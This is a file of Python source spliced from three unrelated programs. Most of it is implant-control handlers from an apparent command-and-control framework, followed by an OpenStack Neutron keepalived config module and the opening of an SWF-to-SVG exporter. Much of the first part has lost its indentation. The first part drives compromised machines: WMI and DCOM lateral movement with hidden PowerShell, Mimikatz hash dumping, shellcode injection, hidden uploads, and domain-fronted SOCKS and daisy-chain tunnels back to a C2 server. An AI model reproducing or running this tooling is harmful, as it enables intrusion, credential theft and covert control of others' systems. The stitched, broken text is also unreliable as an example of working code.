check_module_loaded("New-JScriptShell.ps1", randomuri, user)
with open("%s%sDotNet2JS_PBind.b64" % (PayloadsDirectory, ""), "r") as p:
payload = p.read()
params = re.compile("invoke-wmijspbindpayload ", re.IGNORECASE)
params = params.sub("", command)
new_task("$Shellcode64=\"%s\" #%s" % (payload, "%s%sDotNet2JS_PBind.b64" % (PayloadsDirectory, "")), user, randomuri)
cmd = "new-jscriptshell %s -payload $Shellcode64" % (params)
new_task(cmd, user, randomuri)
target = re.search("(?<=-target )\\S*", str(cmd), re.IGNORECASE)
C2 = get_c2server_all()
print()
print("To connect to the SMB named pipe use the following command:")
print(f"{Colours.GREEN}invoke-pbind -target {target[0]} -secret {PBindSecret} -key {C2.EncKey} -pname {PBindPipeName} -client{Colours.END}")
print()
print("To issue commands to the SMB named pipe use the following command:")
print(Colours.GREEN + "pbind-command \"pwd\"" + Colours.END)
print()
print("To load modules to the SMB named pipe use the following command:")
print(Colours.GREEN + "pbind-loadmodule Invoke-Mimikatz.ps1" + Colours.END)
print()
print("To kill the SMB named pipe use the following command:")
print(Colours.GREEN + "pbind-kill" + Colours.END)
@creds()
def do_invoke_wmijspayload(user, command, randomuri):
check_module_loaded("New-JScriptShell.ps1", randomuri, user)
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.payload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Payload to use: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.b64"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
if os.path.isfile(path):
with open(path, "r") as p:
payload = p.read()
params = re.compile("invoke-wmijspayload ", re.IGNORECASE)
params = params.sub("", command)
new_task("$Shellcode64=\"%s\" #%s" % (payload, path), user, randomuri)
cmd = "new-jscriptshell %s -payload $Shellcode64" % (params)
new_task(cmd, user, randomuri)
else:
print_bad("Need to run createnewpayload first")
return
@creds()
def do_invoke_wmipayload(user, command, randomuri):
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.payload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Payload to use: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.bat"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
if os.path.isfile(path):
with open(path, "r") as p:
payload = p.read()
params = re.compile("invoke-wmipayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-wmiexec %s -command \"%s\"" % (params, payload)
new_task(cmd, user, randomuri)
else:
print_bad("Need to run createdaisypayload first")
return
def do_invoke_dcompayload(user, command, randomuri):
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.payload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Payload to use: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.bat"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
if os.path.isfile(path):
with open(path, "r") as p:
payload = p.read()
p = re.compile(r'(?<=-target.).*')
target = re.search(p, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target, payload)
new_task(pscommand, user, randomuri)
else:
print_bad("Need to run createnewpayload first")
return
@creds(accept_hashes=False)
def do_invoke_runas(user, command, randomuri):
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
params = re.compile("invoke-runas ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-runas %s" % params
new_task(cmd, user, randomuri)
@creds(accept_hashes=False)
def do_invoke_runaspayload(user, command, randomuri):
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.payload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Payload to use: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.bat"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
if os.path.isfile(path):
with open(path, "r") as p:
payload = p.read()
new_task("$proxypayload = \"%s\"" % payload, user, randomuri)
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
params = re.compile("invoke-runaspayload ", re.IGNORECASE)
params = params.sub("", command)
pscommand = f"invoke-runas {params} -command $proxypayload"
new_task(pscommand, user, randomuri)
else:
print("Need to run createnewpayload first")
return
def do_help(user, command, randomuri):
print(posh_help)
def do_get_pid(user, command, randomuri):
implant_details = get_implantdetails(randomuri)
print(implant_details.PID)
def do_upload_file(user, command, randomuri):
source = ""
destination = ""
nothidden = False
if command == "upload-file":
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.upload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*"))
source = PayloadsDirectory + source
except KeyboardInterrupt:
return
while not os.path.isfile(source):
print_bad("File does not exist: %s" % source)
source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*"))
source = PayloadsDirectory + source
destination = session.prompt("Location to upload to: ")
nothidden = yes_no_prompt("Do not hide the file:")
else:
args = argp(command)
source = args.source
destination = args.destination
nothidden = args.nothidden
try:
print("Uploading %s to %s" % (source, destination))
if (nothidden):
uploadcommand = f"upload-file {source} {destination} -NotHidden ${nothidden}"
else:
uploadcommand = f"upload-file {source} {destination}"
new_task(uploadcommand, user, randomuri)
except Exception as e:
print_bad("Error with source file: %s" % e)
traceback.print_exc()
def do_kill_implant(user, command, randomuri):
    impid = get_implantdetails(randomuri)
    ri = input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid.ImplantID)
    if ri.lower() == "n":
        print("Implant not terminated")
    # the default (empty input) is yes, matching the (Y/n) prompt
    if ri == "" or ri.lower() == "y":
        new_task("exit", user, randomuri)
        kill_implant(randomuri)
def do_exit(user, command, randomuri):
return do_kill_implant(user, command, randomuri)
def do_migrate(user, command, randomuri):
params = re.compile("migrate", re.IGNORECASE)
params = params.sub("", command)
implant = get_implantdetails(randomuri)
implant_arch = implant.Arch
implant_comms = implant.Pivot
if implant_arch == "AMD64":
arch = "64"
else:
arch = "86"
if implant_comms == "PS":
path = "%spayloads/Posh_v4_x%s_Shellcode.bin" % (PoshProjectDirectory, arch)
shellcodefile = load_file(path)
elif "Daisy" in implant_comms:
daisyname = input("Name required: ")
path = "%spayloads/%sPosh_v4_x%s_Shellcode.bin" % (PoshProjectDirectory, daisyname, arch)
shellcodefile = load_file(path)
elif "Proxy" in implant_comms:
path = "%spayloads/ProxyPosh_v4_x%s_Shellcode.bin" % (PoshProjectDirectory, arch)
shellcodefile = load_file(path)
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
new_task("$Shellcode%s=\"%s\" #%s" % (arch, base64.b64encode(shellcodefile).decode("utf-8"), os.path.basename(path)), user, randomuri)
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
def do_loadmoduleforce(user, command, randomuri):
params = re.compile("loadmoduleforce ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user, force=True)
def do_loadmodule(user, command, randomuri):
params = re.compile("loadmodule ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user)
def do_pbind_loadmodule(user, command, randomuri):
params = re.compile("pbind-loadmodule ", re.IGNORECASE)
params = params.sub("", command)
new_task(("pbind-loadmodule %s" % params), user, randomuri)
def do_invoke_daisychain(user, command, randomuri):
check_module_loaded("Invoke-DaisyChain.ps1", randomuri, user)
urls = get_allurls()
new_task("%s -URLs '%s'" % (command, urls), user, randomuri)
update_label("DaisyHost", randomuri)
print("Now use createdaisypayload")
def do_inject_shellcode(user, command, randomuri):
params = re.compile("inject-shellcode", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.shellcode-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Location of shellcode file: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.bin"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
try:
shellcodefile = load_file(path)
if shellcodefile is not None:
arch = "64"
new_task("$Shellcode%s=\"%s\" #%s" % (arch, base64.b64encode(shellcodefile).decode("utf-8"), os.path.basename(path)), user, randomuri)
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
except Exception as e:
print_bad("Error loading file: %s" % e)
def do_listmodules(user, command, randomuri):
modules = os.listdir(ModulesDirectory)
modules = sorted(modules, key=lambda s: s.lower())
print("")
print("[+] Available modules:")
print("")
for mod in modules:
if ".ps1" in mod:
print(mod)
def do_modulesloaded(user, command, randomuri):
ml = get_implantdetails(randomuri)
print(ml.ModsLoaded)
def do_ps(user, command, randomuri):
new_task("get-processlist", user, randomuri)
def do_hashdump(user, command, randomuri):
check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user)
new_task("Invoke-Mimikatz -Command '\"lsadump::sam\"'", user, randomuri)
def do_stopdaisy(user, command, randomuri):
update_label("", randomuri)
new_task(command, user, randomuri)
def do_stopsocks(user, command, randomuri):
update_label("", randomuri)
new_task(command, user, randomuri)
def do_sharpsocks(user, command, randomuri):
check_module_loaded("SharpSocks.ps1", randomuri, user)
import string
from random import choice
allchar = string.ascii_letters
channel = "".join(choice(allchar) for x in range(25))
sharpkey = gen_key().decode("utf-8")
sharpurls = get_sharpurls()
sharpurl = get_first_url(select_item("PayloadCommsHost", "C2Server"), select_item("DomainFrontHeader", "C2Server"))
dfheader = get_first_dfheader(select_item("DomainFrontHeader", "C2Server"))
implant = get_implantdetails(randomuri)
pivot = implant.Pivot
if pivot != "PS":
sharpurl = input("Enter the URL for SharpSocks: ")
print("\nIf using Docker, change the SocksHost to be the IP of the PoshC2 Server not 127.0.0.1:49031")
print("sharpsocks -t latest -s \"-c=%s -k=%s --verbose -l=http://*:%s\"\r" % (channel, sharpkey, SocksHost.split(":")[2]) + Colours.GREEN)
print("\nElse\n")
print("sharpsocks -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.GREEN)
ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ")
if ri.lower() == "n":
print("")
if (ri == "") or (ri.lower() == "y"):
taskcmd = "Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 1000" % (sharpurl, channel, sharpkey, sharpurls)
if dfheader:
taskcmd += " -DomainFrontURL %s" % dfheader
new_task(taskcmd, user, randomuri)
update_label("SharpSocks", randomuri)
def do_reversedns(user, command, randomuri):
params = re.compile("reversedns ", re.IGNORECASE)
params = params.sub("", command)
new_task("[System.Net.Dns]::GetHostEntry(\"%s\")" % params, user, randomuri)
def do_rotation(user, command, randomuri):
domain = input("Domain or URL in array format: \"https://www.example.com\",\"https://www.example2.com\" ")
domainfront = input("Domain front URL in array format: \"fjdsklfjdskl.cloudfront.net\",\"jobs.azureedge.net\" ")
new_task("set-variable -name rotdf -value %s" % domainfront, user, randomuri)
new_task("set-variable -name rotate -value %s" % domain, user, randomuri)
def do_get_rotation(user, command, randomuri):
new_task("get-variable -name rotdf", user, randomuri)
new_task("get-variable -name rotate", user, randomuri)
def do_shell(user, command, randomuri):
new_task(command, user, randomuri)
def do_get_screenshotmulti(user, command, randomuri):
pwrStatus = get_powerstatusbyrandomuri(randomuri)
if (pwrStatus is not None and pwrStatus[7]):
ri = input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? (y/N) ")
if ri.lower() == "n" or ri.lower() == "":
return
new_task(command, user, randomuri)
def do_get_screenshot(user, command, randomuri):
pwrStatus = get_powerstatusbyrandomuri(randomuri)
if (pwrStatus is not None and pwrStatus[7]):
ri = input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? (y/N) ")
if ri.lower() == "n" or ri.lower() == "":
return
new_task(command, user, randomuri)
def do_get_powerstatus(user, command, randomuri):
getpowerstatus(randomuri)
def do_loadpowerstatus(user, command, randomuri):
update_label("PSM", randomuri)
new_task(command, user, randomuri)
def do_startdaisy(user, command, randomuri):
check_module_loaded("invoke-daisychain.ps1", randomuri, user)
elevated = input(Colours.GREEN + "Are you elevated? Y/n " + Colours.END)
domain_front = ""
proxy_user = ""
proxy_pass = ""
proxy_url = ""
cred_expiry = ""
if elevated.lower() == "n":
cont = input(Colours.RED + "Daisy from an unelevated context can only bind to localhost, continue? y/N " + Colours.END)
if cont.lower() == "n" or cont == "":
return
bind_ip = "localhost"
else:
bind_ip = input(Colours.GREEN + "Bind IP on the daisy host: " + Colours.END)
bind_port = input(Colours.GREEN + "Bind Port on the daisy host: " + Colours.END)
firstdaisy = input(Colours.GREEN + "Is this the first daisy in the chain? Y/n? " + Colours.END)
default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
default_df_header = get_first_dfheader(DomainFrontHeader)
if default_df_header == default_url:
default_df_header = None
if firstdaisy.lower() == "y" or firstdaisy == "":
upstream_url = input(Colours.GREEN + f"C2 URL (leave blank for {default_url}): " + Colours.END)
domain_front = input(Colours.GREEN + f"Domain front header (leave blank for {str(default_df_header)}): " + Colours.END)
proxy_user = input(Colours.GREEN + "Proxy user (<domain>\\<username>, leave blank if none): " + Colours.END)
proxy_pass = input(Colours.GREEN + "Proxy password (leave blank if none): " + Colours.END)
proxy_url = input(Colours.GREEN + "Proxy URL (leave blank if none): " + Colours.END)
        cred_expiry = input(Colours.GREEN + "Password/Account Expiration Date (e.g. 15/03/2018): " + Colours.END)
if not upstream_url:
upstream_url = default_url
if not domain_front:
if default_df_header:
domain_front = default_df_header
else:
domain_front = ""
else:
upstream_daisy_host = input(Colours.GREEN + "Upstream daisy server: " + Colours.END)
upstream_daisy_port = input(Colours.GREEN + "Upstream daisy port: " + Colours.END)
upstream_url = f"http://{upstream_daisy_host}:{upstream_daisy_port}"
command = f"invoke-daisychain -daisyserver http://{bind_ip} -port {bind_port} -c2server {upstream_url}"
if domain_front:
command = command + f" -domfront {domain_front}"
if proxy_url:
command = command + f" -proxyurl '{proxy_url}'"
if proxy_user:
command = command + f" -proxyuser '{proxy_user}'"
if proxy_pass:
command = command + f" -proxypassword '{proxy_pass}'"
if elevated.lower() == "y" or elevated == "":
        firewall = input(Colours.GREEN + "Add firewall rule? (uses netsh.exe) y/N: " + Colours.END)
if firewall.lower() == "n" or firewall == "":
command = command + " -nofwrule"
else:
print_good("Not elevated so binding to localhost and not adding firewall rule")
command = command + " -localhost"
urls = get_allurls()
command = command + f" -urls '{urls}'"
new_task(command, user, randomuri)
update_label("DaisyHost", randomuri)
    createpayloads = input(Colours.GREEN + "Would you like to create payloads for this Daisy Server? Y/n " + Colours.END)
if createpayloads.lower() == "y" or createpayloads == "":
name = input(Colours.GREEN + "Enter a payload name: " + Colours.END)
daisyhost = get_implantdetails(randomuri)
proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
C2 = get_c2server_all()
urlId = new_urldetails(name, f"\"http://{bind_ip}:{bind_port}\"", "\"\"", proxy_url, proxy_user, proxy_pass, cred_expiry)
newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, "%s?d" % get_newimplanturl(), PayloadsDirectory, URLID=urlId, PowerShellProxyCommand=proxynone)
newPayload.PSDropper = (newPayload.PSDropper).replace("$pid;%s" % (upstream_url), "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))
newPayload.CreateDroppers(name)
newPayload.CreateRaw(name)
newPayload.CreateDlls(name)
newPayload.CreateShellcode(name)
newPayload.CreateEXE(name)
newPayload.CreateMsbuild(name)
print_good("Created new %s daisy payloads" % name)
def do_sharp(user, command, randomuri):
    check = input(Colours.RED + "\nDid you mean to run this sharp command in a PS implant? y/N " + Colours.END)
if check.lower() == "y":
new_task(command, user, randomuri)
# Copyright (C) 2014 eNovance SAS <licensing@enovance.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import errno
import itertools
import os
import netaddr
from neutron_lib import exceptions
from oslo_config import cfg
from oslo_log import log as logging
from neutron._i18n import _, _LE
from neutron.agent.linux import external_process
from neutron.common import constants
from neutron.common import utils as common_utils
VALID_STATES = ['MASTER', 'BACKUP']
VALID_AUTH_TYPES = ['AH', 'PASS']
HA_DEFAULT_PRIORITY = 50
PRIMARY_VIP_RANGE_SIZE = 24
KEEPALIVED_SERVICE_NAME = 'keepalived'
KEEPALIVED_EMAIL_FROM = 'neutron@openstack.local'
KEEPALIVED_ROUTER_ID = 'neutron'
GARP_MASTER_DELAY = 60
LOG = logging.getLogger(__name__)
def get_free_range(parent_range, excluded_ranges, size=PRIMARY_VIP_RANGE_SIZE):
"""Get a free IP range, from parent_range, of the specified size.
:param parent_range: String representing an IP range. E.g: '169.254.0.0/16'
:param excluded_ranges: A list of strings to be excluded from parent_range
:param size: What should be the size of the range returned?
:return: A string representing an IP range
"""
free_cidrs = netaddr.IPSet([parent_range]) - netaddr.IPSet(excluded_ranges)
for cidr in free_cidrs.iter_cidrs():
if cidr.prefixlen <= size:
return '%s/%s' % (cidr.network, size)
raise ValueError(_('Network of size %(size)s, from IP range '
'%(parent_range)s excluding IP ranges '
'%(excluded_ranges)s was not found.') %
{'size': size,
'parent_range': parent_range,
'excluded_ranges': excluded_ranges})
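# Illustrative usage (not part of the original module; the excluded ranges are
# made-up values): the first free CIDR large enough is trimmed to a /24.
#
#     >>> get_free_range('169.254.0.0/16',
#     ...                ['169.254.0.0/24', '169.254.1.0/24'])
#     '169.254.2.0/24'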
class InvalidInstanceStateException(exceptions.NeutronException):
message = _('Invalid instance state: %(state)s, valid states are: '
'%(valid_states)s')
def __init__(self, **kwargs):
if 'valid_states' not in kwargs:
kwargs['valid_states'] = ', '.join(VALID_STATES)
super(InvalidInstanceStateException, self).__init__(**kwargs)
class InvalidAuthenticationTypeException(exceptions.NeutronException):
message = _('Invalid authentication type: %(auth_type)s, '
'valid types are: %(valid_auth_types)s')
def __init__(self, **kwargs):
if 'valid_auth_types' not in kwargs:
kwargs['valid_auth_types'] = ', '.join(VALID_AUTH_TYPES)
super(InvalidAuthenticationTypeException, self).__init__(**kwargs)
class KeepalivedVipAddress(object):
"""A virtual address entry of a keepalived configuration."""
def __init__(self, ip_address, interface_name, scope=None):
self.ip_address = ip_address
self.interface_name = interface_name
self.scope = scope
def __eq__(self, other):
return (isinstance(other, KeepalivedVipAddress) and
self.ip_address == other.ip_address)
def __str__(self):
return '[%s, %s, %s]' % (self.ip_address,
self.interface_name,
self.scope)
def build_config(self):
result = '%s dev %s' % (self.ip_address, self.interface_name)
if self.scope:
result += ' scope %s' % self.scope
return result
class KeepalivedVirtualRoute(object):
"""A virtual route entry of a keepalived configuration."""
def __init__(self, destination, nexthop, interface_name=None,
scope=None):
self.destination = destination
self.nexthop = nexthop
self.interface_name = interface_name
self.scope = scope
def build_config(self):
output = self.destination
if self.nexthop:
output += ' via %s' % self.nexthop
if self.interface_name:
output += ' dev %s' % self.interface_name
if self.scope:
output += ' scope %s' % self.scope
return output
class KeepalivedInstanceRoutes(object):
def __init__(self):
self.gateway_routes = []
self.extra_routes = []
self.extra_subnets = []
def remove_routes_on_interface(self, interface_name):
self.gateway_routes = [gw_rt for gw_rt in self.gateway_routes
if gw_rt.interface_name != interface_name]
# NOTE(amuller): extra_routes are initialized from the router's
# 'routes' attribute. These routes do not have an interface
# parameter and so cannot be removed via an interface_name lookup.
self.extra_subnets = [route for route in self.extra_subnets if
route.interface_name != interface_name]
@property
def routes(self):
return self.gateway_routes + self.extra_routes + self.extra_subnets
def __len__(self):
return len(self.routes)
def build_config(self):
return itertools.chain([' virtual_routes {'],
(' %s' % route.build_config()
for route in self.routes),
[' }'])
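# Sketch of the generated block (route values are assumed): a single default
# gateway route renders roughly as
#
#     virtual_routes {
#         0.0.0.0/0 via 192.168.1.1 dev qg-abc
#     }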
class KeepalivedInstance(object):
"""Instance section of a keepalived configuration."""
def __init__(self, state, interface, vrouter_id, ha_cidrs,
priority=HA_DEFAULT_PRIORITY, advert_int=None,
mcast_src_ip=None, nopreempt=False,
garp_master_delay=GARP_MASTER_DELAY):
self.name = 'VR_%s' % vrouter_id
if state not in VALID_STATES:
raise InvalidInstanceStateException(state=state)
self.state = state
self.interface = interface
self.vrouter_id = vrouter_id
self.priority = priority
self.nopreempt = nopreempt
self.advert_int = advert_int
self.mcast_src_ip = mcast_src_ip
self.garp_master_delay = garp_master_delay
self.track_interfaces = []
self.vips = []
self.virtual_routes = KeepalivedInstanceRoutes()
self.authentication = None
self.primary_vip_range = get_free_range(
parent_range=constants.PRIVATE_CIDR_RANGE,
excluded_ranges=[constants.METADATA_CIDR,
constants.DVR_FIP_LL_CIDR] + ha_cidrs,
size=PRIMARY_VIP_RANGE_SIZE)
def set_authentication(self, auth_type, password):
if auth_type not in VALID_AUTH_TYPES:
raise InvalidAuthenticationTypeException(auth_type=auth_type)
self.authentication = (auth_type, password)
def add_vip(self, ip_cidr, interface_name, scope):
vip = KeepalivedVipAddress(ip_cidr, interface_name, scope)
if vip not in self.vips:
self.vips.append(vip)
else:
LOG.debug('VIP %s already present in %s', vip, self.vips)
def remove_vips_vroutes_by_interface(self, interface_name):
self.vips = [vip for vip in self.vips
if vip.interface_name != interface_name]
self.virtual_routes.remove_routes_on_interface(interface_name)
def remove_vip_by_ip_address(self, ip_address):
self.vips = [vip for vip in self.vips
if vip.ip_address != ip_address]
def get_existing_vip_ip_addresses(self, interface_name):
return [vip.ip_address for vip in self.vips
if vip.interface_name == interface_name]
def _build_track_interface_config(self):
return itertools.chain(
[' track_interface {'],
(' %s' % i for i in self.track_interfaces),
[' }'])
def get_primary_vip(self):
"""Return an address in the primary_vip_range CIDR, with the router's
VRID in the host section.
For example, if primary_vip_range is 169.254.0.0/24, and this router's
VRID is 5, the result is 169.254.0.5. Using the VRID assures that
the primary VIP is consistent amongst HA router instances on different
nodes.
"""
ip = (netaddr.IPNetwork(self.primary_vip_range).network +
self.vrouter_id)
return str(netaddr.IPNetwork('%s/%s' % (ip, PRIMARY_VIP_RANGE_SIZE)))
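    # Worked example (values from the docstring): netaddr's IPNetwork exposes
    # .network as an integer-addable address, so with primary_vip_range
    # '169.254.0.0/24' and vrouter_id 5 this returns '169.254.0.5/24'.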
def _build_vips_config(self):
# NOTE(amuller): The primary VIP must be consistent in order to avoid
# keepalived bugs. Changing the VIP in the 'virtual_ipaddress' and
# SIGHUP'ing keepalived can remove virtual routers, including the
# router's default gateway.
# We solve this by never changing the VIP in the virtual_ipaddress
# section, herein known as the primary VIP.
# The only interface known to exist for HA routers is the HA interface
# (self.interface). We generate an IP on that device and use it as the
# primary VIP. The other VIPs (Internal interfaces IPs, the external
# interface IP and floating IPs) are placed in the
# virtual_ipaddress_excluded section.
primary = KeepalivedVipAddress(self.get_primary_vip(), self.interface)
vips_result = [' virtual_ipaddress {',
' %s' % primary.build_config(),
' }']
if self.vips:
vips_result.extend(
itertools.chain([' virtual_ipaddress_excluded {'],
(' %s' % vip.build_config()
for vip in
sorted(self.vips,
key=lambda vip: vip.ip_address)),
[' }']))
return vips_result
def _build_virtual_routes_config(self):
return itertools.chain([' virtual_routes {'],
(' %s' % route.build_config()
for route in self.virtual_routes),
[' }'])
def build_config(self):
config = ['vrrp_instance %s {' % self.name,
' state %s' % self.state,
' interface %s' % self.interface,
' virtual_router_id %s' % self.vrouter_id,
' priority %s' % self.priority,
' garp_master_delay %s' % self.garp_master_delay]
if self.nopreempt:
config.append(' nopreempt')
if self.advert_int:
config.append(' advert_int %s' % self.advert_int)
if self.authentication:
auth_type, password = self.authentication
authentication = [' authentication {',
' auth_type %s' % auth_type,
' auth_pass %s' % password,
' }']
config.extend(authentication)
if self.mcast_src_ip:
config.append(' mcast_src_ip %s' % self.mcast_src_ip)
if self.track_interfaces:
config.extend(self._build_track_interface_config())
config.extend(self._build_vips_config())
if len(self.virtual_routes):
config.extend(self.virtual_routes.build_config())
config.append('}')
return config
class KeepalivedConf(object):
"""A keepalived configuration."""
def __init__(self):
self.reset()
def reset(self):
self.instances = {}
def add_instance(self, instance):
self.instances[instance.vrouter_id] = instance
def get_instance(self, vrouter_id):
return self.instances.get(vrouter_id)
def build_config(self):
config = ['global_defs {',
' notification_email_from %s' % KEEPALIVED_EMAIL_FROM,
' router_id %s' % KEEPALIVED_ROUTER_ID,
'}'
]
for instance in self.instances.values():
config.extend(instance.build_config())
return config
def get_config_str(self):
"""Generates and returns the keepalived configuration.
:return: Keepalived configuration string.
"""
return '\n'.join(self.build_config())
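# Minimal usage sketch (interface names and CIDRs are assumptions for
# illustration only):
#
#     conf = KeepalivedConf()
#     instance = KeepalivedInstance('MASTER', 'ha-eth0', vrouter_id=1,
#                                   ha_cidrs=['169.254.192.0/18'])
#     instance.add_vip('10.0.0.5/24', 'qr-abc', None)
#     conf.add_instance(instance)
#     print(conf.get_config_str())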
class KeepalivedManager(object):
"""Wrapper for keepalived.
This wrapper permits to write keepalived config files, to start/restart
keepalived process.
"""
def __init__(self, resource_id, config, process_monitor, conf_path='/tmp',
namespace=None):
self.resource_id = resource_id
self.config = config
self.namespace = namespace
self.process_monitor = process_monitor
self.conf_path = conf_path
def get_conf_dir(self):
confs_dir = os.path.abspath(os.path.normpath(self.conf_path))
conf_dir = os.path.join(confs_dir, self.resource_id)
return conf_dir
def get_full_config_file_path(self, filename, ensure_conf_dir=True):
conf_dir = self.get_conf_dir()
if ensure_conf_dir:
common_utils.ensure_dir(conf_dir)
return os.path.join(conf_dir, filename)
def _output_config_file(self):
config_str = self.config.get_config_str()
config_path = self.get_full_config_file_path('keepalived.conf')
common_utils.replace_file(config_path, config_str)
return config_path
@staticmethod
def _safe_remove_pid_file(pid_file):
try:
os.remove(pid_file)
except OSError as e:
if e.errno != errno.ENOENT:
LOG.error(_LE("Could not delete file %s, keepalived can "
"refuse to start."), pid_file)
def get_vrrp_pid_file_name(self, base_pid_file):
return '%s-vrrp' % base_pid_file
def get_conf_on_disk(self):
config_path = self.get_full_config_file_path('keepalived.conf')
try:
with open(config_path) as conf:
return conf.read()
except (OSError, IOError) as e:
if e.errno != errno.ENOENT:
raise
def spawn(self):
config_path = self._output_config_file()
keepalived_pm = self.get_process()
vrrp_pm = self._get_vrrp_process(
self.get_vrrp_pid_file_name(keepalived_pm.get_pid_file_name()))
keepalived_pm.default_cmd_callback = (
self._get_keepalived_process_callback(vrrp_pm, config_path))
keepalived_pm.enable(reload_cfg=True)
self.process_monitor.register(uuid=self.resource_id,
service_name=KEEPALIVED_SERVICE_NAME,
monitored_process=keepalived_pm)
LOG.debug('Keepalived spawned with config %s', config_path)
def disable(self):
self.process_monitor.unregister(uuid=self.resource_id,
service_name=KEEPALIVED_SERVICE_NAME)
pm = self.get_process()
pm.disable(sig='15')
def get_process(self):
return external_process.ProcessManager(
cfg.CONF,
self.resource_id,
self.namespace,
pids_path=self.conf_path)
def _get_vrrp_process(self, pid_file):
return external_process.ProcessManager(
cfg.CONF,
self.resource_id,
self.namespace,
pid_file=pid_file)
def _get_keepalived_process_callback(self, vrrp_pm, config_path):
def callback(pid_file):
            # If the keepalived process crashed unexpectedly, the orphaned
            # vrrp process would prevent a new keepalived process from being
            # spawned. This check lets the l3-agent kill the orphaned process
            # and spawn keepalived successfully.
if vrrp_pm.active:
vrrp_pm.disable()
self._safe_remove_pid_file(pid_file)
self._safe_remove_pid_file(self.get_vrrp_pid_file_name(pid_file))
cmd = ['keepalived', '-P',
'-f', config_path,
'-p', pid_file,
'-r', self.get_vrrp_pid_file_name(pid_file)]
return cmd
return callback
"""
This module defines exporters for the SWF file format.
"""
from __future__ import absolute_import
from .consts import *
from .geom import *
from .utils import *
from .data import *
from .tag import *
from .filters import *
from lxml import objectify
from lxml import etree
import base64
from six import unichr
from six.moves import map
from six.moves import range
try:
import Image
except ImportError:
from PIL import Image
from io import BytesIO
import math
import re
import copy
import struct
SVG_VERSION = "1.1"
SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
XLINK_HREF = "{%s}href" % XLINK_NS
NS = {"svg" : SVG_NS, "xlink" : XLINK_NS}
PIXELS_PER_TWIP = 20
EM_SQUARE_LENGTH = 1024
MINIMUM_STROKE_WIDTH = 0.5
CAPS_STYLE = {
0 : 'round',
1 : 'butt',
2 : 'square'
}
JOIN_STYLE = {
0 : 'round',
1 : 'bevel',
2 : 'miter'
}
class DefaultShapeExporter(object):
"""
The default (abstract) Shape exporter class.
All shape exporters should extend this class.
"""
def __init__(self, swf=None, debug=False, force_stroke=False):
        self.swf = swf
self.debug = debug
self.force_stroke = force_stroke
def begin_bitmap_fill(self, bitmap_id, matrix=None, repeat=False, smooth=False):
pass
def begin_fill(self, color, alpha=1.0):
pass
def begin_gradient_fill(self, type, colors, alphas, ratios,
matrix=None,
spreadMethod=SpreadMethod.PAD,
interpolationMethod=InterpolationMethod.RGB,
focalPointRatio=0.0):
pass
